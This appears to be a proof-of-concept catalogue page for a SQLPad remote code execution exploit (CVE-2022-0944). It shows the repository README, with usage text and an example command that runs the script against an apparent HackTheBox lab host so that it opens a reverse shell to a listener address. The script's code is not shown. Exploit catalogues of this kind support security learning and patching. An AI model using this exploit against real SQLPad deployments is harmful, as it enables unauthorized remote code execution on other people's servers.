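POC details: 51dd4f1055f003d09b4d02c52552064d3bd42be3

Source
Related vulnerability
Title: sqlpad code injection vulnerability (CVE-2022-0944)
Description: sqlpad is a web-based SQL editor. sqlpad contains a security vulnerability; no details of the vulnerability are currently available. Follow announcements from CNNVD or the vendor.
Introduction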
# CVE-2022-0944

Proof-of-concept exploit for [SQLPad RCE (CVE-2022-0944)](https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb) that leads to RCE with a reverse shell to the attacker's PC.

## Usage

```
usage: script.py URL IP PORT

positional arguments:
  URL         URL to SQLPad
  IP          Listener host address for reverse shell
  PORT        Listener port for reverse shell
```

**Example:**

```bash
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
```

# Disclaimer
This repository contains tools that are intended solely for educational purposes, specifically for use in cybersecurity learning environments. The author of this code assumes no responsibility for any consequences arising from the use, misuse, or modification of this code. The code is provided "as is" without any warranty, either express or implied, including but not limited to the implied warranties of merchantability or fitness for a particular purpose.
File snapshot

[4.0K] /data/pocs/51dd4f1055f003d09b4d02c52552064d3bd42be3
├── [1.0K] LICENSE
├── [ 964] README.md
└── [2.5K] script.py

0 directories, 3 files